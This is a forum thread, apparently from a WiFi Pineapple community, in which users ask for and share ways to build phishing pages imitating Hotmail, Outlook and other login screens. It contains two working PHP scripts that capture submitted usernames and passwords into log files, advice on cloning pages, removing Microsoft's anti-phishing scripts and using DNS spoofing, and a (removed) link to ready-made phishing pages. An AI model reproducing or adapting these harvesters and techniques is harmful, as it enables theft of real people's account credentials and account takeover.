Jump to content

RQ: Hotmail.com & Outlook.com phishing pages (or guide to how to make)


omfgplz

Recommended Posts

I have found the easiest way to clone a site is to use google chrome, browser to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies.

From there, just use this resource to modify what happens to the form data.

I think Darren wrote the following little php file to store the user credentials from the form data received:


<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;

$filed = @fopen("bitches.txt", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>

Edited by coolgeek
Link to comment
Share on other sites

Have anybody managed to make a functional hotmail phish yet?

I'm struggling to get it working..

The thing is that it seems M$ is trying to avoid phishing attacks by using some scripting.

I have very limited knowledge in web programming, but have been snooping around a little bit in their code, and it seems that

1. You can't avoid the scripts totally because then you will not be able to type username/password.

2. The script mbox.js is checking if a cookie is valid by checking session and pc id. If this cookie is not found to be legit, you will be redirected to https://login.live.com/cookiesDisabled.srf?..

Now I guess there is some magic happening in the 13'th line in the hotmail source code, but for a noob it's quite exhausting to make sense of..

Link to comment
Share on other sites

If you cant achieve this then you have a long way to go and i am assuming no one here is going to do this for you.

I will however give you a little information, You need a copy of the login page and a scipt that will take the data entered into user name and password fields and save or send it somewhere. More complex scripts are sometimes able to take the information and log the user into the target site, To use this attack on someone with any knowledge of computing whatsoever you will need to employ attacks like dns spoofing.

@loozr you do not require any of the scripts hosted on the target site, you simply need a site that looks like the target.

Link to comment
Share on other sites

@Sud0x3

That's absolutely true. However, for me it's faster to hack around in the existing code, than to make a similar page myself from scratch(since my knowledge in code is quite limited, I can read some, but not write).

I have managed to edit out most of the scripting in this page, and successfully come up with an ok result. However, I have a little problem in getting the "Sign in" button to do some posting now.. or, actually it''s doing something, it's removing the input, but I'm not getting any post in return. And yes I have edited the name of the inputfields to equal the "pickup"script..

Is there any app that can trace the actions in a given webpage?

Link to comment
Share on other sites

  • 2 weeks later...

Can someone help me put? My problem is that on the below script after testing Facebook page nothing is saved on pineapple.log. Or should I use the one Darren has posted? Thanks

<?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) {        $nam = stripslashes($_POST['name']);        $pas = stripslashes($_POST['pass']);        $nam = htmlspecialchars($nam, ENT_QUOTES);        $pas = htmlspecialchars($pas, ENT_QUOTES);        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;        $filed = @fopen("pineapple/phish.log", "a+");        @fwrite($filed, "$content\n");        @fclose($filed); } ?>

<html><body>

<script type=text/javascript">

function goBack()

{

window.history.back()

}

</script>

</head>

<body onload="goBack()">

</body></html>

Link to comment
Share on other sites

Has anyone tried using SET to try to clone the page. If you are using BT5, go to var/www and browse files. Should do a passable job.

If you want to wait a while longer, wait for WhistleMaster's new module, the MITM/keylogger to come about.

All depending on what you want :)

Link to comment
Share on other sites

  • 4 weeks later...

I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed**

Link to comment
Share on other sites

I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter,instagram, etc... Please use them responsibly. Link: **Removed**

Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D

Link to comment
Share on other sites

Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D

Thanks. I don't know if I will create a mobile version of them. It took me a long time to just create hotmail, outlook, and instagram by hand for the desktop alone.

Link to comment
Share on other sites

  • 1 month later...
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...